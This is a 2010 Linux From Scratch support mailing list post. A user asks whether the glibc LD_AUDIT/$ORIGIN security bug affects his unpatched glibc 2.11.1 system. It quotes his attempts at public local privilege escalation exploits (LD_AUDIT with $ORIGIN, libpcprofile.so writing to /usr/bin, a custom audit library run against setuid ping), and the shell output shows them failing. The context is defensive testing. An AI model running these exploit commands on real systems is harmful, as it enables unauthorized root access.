On Thu, Nov 11, 2010 at 09:16:53PM +0000, Ken Moffat wrote: > On Thu, Nov 11, 2010 at 08:40:24PM +0100, bendeguz wrote: > > Do I have to worry about the mentioned security bug > > in glibc? I'm using version 2.11.1. > > > It's fixed in -dev by the ld_audit_fix and origin_fix patches. I > think they also apply to 2.11.1, but I'm not sure. See the archives > for lfs-dev last month. Some of us using 2.12.1 have managed to > upgrade glibc in an existing system, but only using the same options > and version, and I think we all had good backups in case it went > wrong - I still find doing that scary, and shutting down to reboot > wasn't clean (but, I use ext4 so no worries there). > Hi!
I tried the exploits on the lfs-dev mailing list and the exploit here http://seclists.org/fulldisclosure/2010/Oct/257, but something is wrong. It doesn't work as "expected". In the latter case: $ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 Inconsistency detected by ld.so: dl-open.c: 231: dl_open_worker: Assertion '(call_map)->l_name[0] == '\0'' failed! then, from console, it drops me to login prompt In DJ Lucas's example http://linuxfromscratch.org/pipermail/lfs-dev/2010-October/064372.html bash-4.1$ ls /usr/bin/bad ls: cannot access /usr/bin/bad: No such file or directory bash-4.1$ umask 0 bash-4.1$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/usr/bin/bad" ping ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit interface: undefined symbol: la_version; ignored. ping: missing host operand Try `ping --help' or `ping --usage' for more information. bash-4.1$ ls /usr/bin/bad -l ls: cannot access /usr/bin/bad: No such file or directory bash-4.1$ In Bryan's example: http://linuxfromscratch.org/pipermail/lfs-dev/2010-October/064368.html bash-4.1$ gcc -fPIC -shared -o /tmp/libbad.so.0 bad.c bash-4.1$ LD_AUDIT=/tmp/libbad.so.0 EXPLOIT_TGT=/usr/bin/bad ping ERROR: ld.so: object '/tmp/libbad.so.0' cannot be loaded as audit interface: failed to map segment from shared object; ignored. ping: missing host operand Try `ping --help' or `ping --usage' for more information. bash-4.1$ ls /usr/bin/bad ls: cannot access /usr/bin/bad: No such file or directory bash-4.1$ sudo mv /tmp/libbad.so.0 /lib bash-4.1$ LD_AUDIT=libbad.so.0 EXPLOIT_TGT=/usr/bin/bad ping ERROR: ld.so: object 'libbad.so.0' cannot be loaded as audit interface: undefined symbol: la_version; ignored. ping: missing host operand Try `ping --help' or `ping --usage' for more information. bash-4.1$ ls /usr/bin/bad ls: cannot access /usr/bin/bad: No such file or directory bash-4.1$ I have glibc-2.11.1 and it's not been patched, yet. It's just a desktop computer, but I'm curious about the issue. Thanks for your time! Regards, bendeguz -- http://linuxfromscratch.org/mailman/listinfo/blfs-support FAQ: http://www.linuxfromscratch.org/blfs/faq.html Unsubscribe: See the above information page
